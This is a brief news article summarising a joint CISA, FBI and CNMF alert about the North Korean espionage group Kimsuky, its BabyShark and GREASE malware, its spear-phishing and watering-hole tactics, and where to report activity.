Kimsuky APT Hackers Attacking Private Businesses
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF) issued a joint alert (AA20-301A) regarding North Korean cyber attacks. The alert warns of cyber attacks by a North Korean hacking group referred to Kimsuky.
Kimsuky threat actors carry out cyber espionage attacks on individual experts and private sector businesses in South Korea, Japan, and the United States. The hacking gang typically targets Individuals known as experts in their field, think tanks, and South Korean government entities.
“CISA, FBI, and CNMF recommend that individuals and organizations with this target profile increase their defenses and adopt a heightened state of awareness. Important mitigations include safeguards against spear phishing, enabling multi-factor authentication, and user awareness training,” says the joint alert.
BabyShark doo, doo, doo, doo, doo, doo
Kimsuky deploys BabyShark malware delivered via a phishing message tailored to match the targets’ interests. The email contains a malicious link or an attachment to lure the victim into downloading the malware. After obtaining initial access, Kimsuky uses BabyShark to alter the registry key uninfected computer, download additional files, execute commands, and other malicious acts.
Kimsuky also uses GREASE malware.
However, email phishing isn’t the only way Kimsuky compromises targets. The advanced persistent threat group has also used watering hole attacks and spread malware on torrent sharing sites. In 2018, the hackers used a Google Chrome extension to infect victims’ computers and steal passwords from their web browsers.
The threat actors have also sent emails impersonating South Korean reporters.
Kimsuky Advanced Persistent Threat Group
The United States Federal Government refers to North Korean state sponsored malicious cyber activity as HIDDEN COBRA. Kimsuky is an advanced persistent threat (APT) group that carries out cyber espionage attacks on private sector businesses on behalf of the North Korean government. The hackers use spear phishing to trick targets and gain access the host or networks so they can steal information.
It is believed that Kimsuky hackers have been active since about 2012.
To report Kimsuky APT group or other malicious cyber activity related to this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937, or by e-mail at CyWatch@fbi.gov